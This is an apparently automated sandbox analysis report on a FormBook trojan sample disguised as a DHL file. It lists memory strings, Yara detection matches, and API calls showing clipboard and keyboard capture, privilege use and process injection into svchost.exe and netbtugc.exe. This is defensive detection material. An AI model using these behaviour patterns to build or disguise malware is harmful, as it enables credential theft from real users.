Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.4530981261.0000000004BB2000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003892000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000004.00000002.4530981261.0000000004BB2000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003892000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::s
Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000004.00000003.2394971001.0000000007F64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000004.00000002.4530981261.00000000051FA000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003EDA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?UzG=mxnR
Source: netbtugc.exe, 00000004.00000002.4530981261.000000000488E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4532489216.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.000000000356E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.000000000356E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_0094425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0094425A

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_00944458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00944458

Source: C:\Users\user\Desktop\DHL 806-232024.exe

0_2_0094425A

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_00930219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00930219

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_0095CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0095CDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: This is a third-party compiled AutoIt script.	0_2_008D3B4C
Source: DHL 806-232024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DHL 806-232024.exe, 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4b0c97a9-1
Source: DHL 806-232024.exe, 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_6730f8f6-b
Source: DHL 806-232024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_81801f33-3
Source: DHL 806-232024.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d12ecab3-0

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0034B363 NtClose,	2_2_0034B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00321D09 NtProtectVirtualMemory,	2_2_00321D09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72B60 NtClose,LdrInitializeThunk,	2_2_02F72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_02F72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_02F72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,	2_2_02F735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F74340 NtSetContextThread,	2_2_02F74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F74650 NtSuspendThread,	2_2_02F74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72AF0 NtWriteFile,	2_2_02F72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72AD0 NtReadFile,	2_2_02F72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72AB0 NtWaitForSingleObject,	2_2_02F72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72BF0 NtAllocateVirtualMemory,	2_2_02F72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72BE0 NtQueryValueKey,	2_2_02F72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72BA0 NtEnumerateValueKey,	2_2_02F72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72B80 NtQueryInformationFile,	2_2_02F72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72EE0 NtQueueApcThread,	2_2_02F72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72EA0 NtAdjustPrivilegesToken,	2_2_02F72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72E80 NtReadVirtualMemory,	2_2_02F72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72E30 NtWriteVirtualMemory,	2_2_02F72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72FE0 NtCreateFile,	2_2_02F72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72FB0 NtResumeThread,	2_2_02F72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72FA0 NtQuerySection,	2_2_02F72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72F90 NtProtectVirtualMemory,	2_2_02F72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72F60 NtCreateProcessEx,	2_2_02F72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72F30 NtCreateSection,	2_2_02F72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72CF0 NtOpenProcess,	2_2_02F72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72CC0 NtQueryVirtualMemory,	2_2_02F72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72CA0 NtQueryInformationToken,	2_2_02F72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72C60 NtCreateKey,	2_2_02F72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72C00 NtQueryInformationProcess,	2_2_02F72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72DD0 NtDelayExecution,	2_2_02F72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72DB0 NtEnumerateKey,	2_2_02F72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72D30 NtUnmapViewOfSection,	2_2_02F72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72D10 NtMapViewOfSection,	2_2_02F72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72D00 NtSetInformationFile,	2_2_02F72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73090 NtSetValueKey,	2_2_02F73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73010 NtOpenDirectoryObject,	2_2_02F73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F739B0 NtGetContextThread,	2_2_02F739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73D70 NtOpenThread,	2_2_02F73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73D10 NtOpenProcessToken,	2_2_02F73D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03714340 NtSetContextThread,LdrInitializeThunk,	4_2_03714340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03714650 NtSuspendThread,LdrInitializeThunk,	4_2_03714650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712B60 NtClose,LdrInitializeThunk,	4_2_03712B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_03712BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_03712BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_03712BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712AF0 NtWriteFile,LdrInitializeThunk,	4_2_03712AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712AD0 NtReadFile,LdrInitializeThunk,	4_2_03712AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712F30 NtCreateSection,LdrInitializeThunk,	4_2_03712F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712FE0 NtCreateFile,LdrInitializeThunk,	4_2_03712FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712FB0 NtResumeThread,LdrInitializeThunk,	4_2_03712FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_03712EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_03712E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_03712D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_03712D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_03712DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712DD0 NtDelayExecution,LdrInitializeThunk,	4_2_03712DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_03712C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712C60 NtCreateKey,LdrInitializeThunk,	4_2_03712C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_03712CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037135C0 NtCreateMutant,LdrInitializeThunk,	4_2_037135C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037139B0 NtGetContextThread,LdrInitializeThunk,	4_2_037139B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712B80 NtQueryInformationFile,	4_2_03712B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712AB0 NtWaitForSingleObject,	4_2_03712AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712F60 NtCreateProcessEx,	4_2_03712F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712FA0 NtQuerySection,	4_2_03712FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712F90 NtProtectVirtualMemory,	4_2_03712F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712E30 NtWriteVirtualMemory,	4_2_03712E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712EA0 NtAdjustPrivilegesToken,	4_2_03712EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712D00 NtSetInformationFile,	4_2_03712D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712DB0 NtEnumerateKey,	4_2_03712DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712C00 NtQueryInformationProcess,	4_2_03712C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712CF0 NtOpenProcess,	4_2_03712CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03712CC0 NtQueryVirtualMemory,	4_2_03712CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03713010 NtOpenDirectoryObject,	4_2_03713010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03713090 NtSetValueKey,	4_2_03713090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03713D70 NtOpenThread,	4_2_03713D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03713D10 NtOpenProcessToken,	4_2_03713D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DD7A70 NtReadFile,	4_2_02DD7A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DD7BE0 NtClose,	4_2_02DD7BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DD7B50 NtDeleteFile,	4_2_02DD7B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DD7920 NtCreateFile,	4_2_02DD7920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DD7D30 NtAllocateVirtualMemory,	4_2_02DD7D30

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_009340B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_009340B1

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_00928858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00928858

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_0093545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0093545F

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008FDBB5	0_2_008FDBB5
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0095804A	0_2_0095804A
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008DE060	0_2_008DE060
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008E4140	0_2_008E4140
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008F2405	0_2_008F2405
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00906522	0_2_00906522
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0090267E	0_2_0090267E
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00950665	0_2_00950665
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008DE800	0_2_008DE800
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008F283A	0_2_008F283A
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008E6843	0_2_008E6843
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_009089DF	0_2_009089DF
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00906A94	0_2_00906A94
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00950AE2	0_2_00950AE2
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008E8A0E	0_2_008E8A0E
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00938B13	0_2_00938B13
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0092EB07	0_2_0092EB07
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008FCD61	0_2_008FCD61
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00907006	0_2_00907006
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008E3190	0_2_008E3190
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008E710E	0_2_008E710E
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008D1287	0_2_008D1287
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008F33C7	0_2_008F33C7
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008FF419	0_2_008FF419
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008E5680	0_2_008E5680
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008F16C4	0_2_008F16C4
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008E58C0	0_2_008E58C0
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008F78D3	0_2_008F78D3
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008F1BB8	0_2_008F1BB8
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00909D05	0_2_00909D05
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008DFE40	0_2_008DFE40
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008F1FD0	0_2_008F1FD0
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008FBFE6	0_2_008FBFE6
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00E505F8	0_2_00E505F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00336873	2_2_00336873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00336871	2_2_00336871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003228A0	2_2_003228A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00321110	2_2_00321110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00330173	2_2_00330173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0032E1F3	2_2_0032E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00321290	2_2_00321290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00323500	2_2_00323500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003226A0	2_2_003226A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00322698	2_2_00322698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0032268A	2_2_0032268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0032FF53	2_2_0032FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0034D753	2_2_0034D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0032FF4A	2_2_0032FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC02C0	2_2_02FC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030003E6	2_2_030003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA352	2_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030001AA	2_2_030001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF81CC	2_2_02FF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC8158	2_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30100	2_2_02F30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5C6E0	2_2_02F5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3C7C0	2_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64750	2_2_02F64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEE4F6	2_2_02FEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03000591	2_2_03000591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF2446	2_2_02FF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF6BD7	2_2_02FF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFAB40	2_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E8F0	2_2_02F6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F268B8	2_2_02F268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300A9A6	2_2_0300A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4A840	2_2_02F4A840
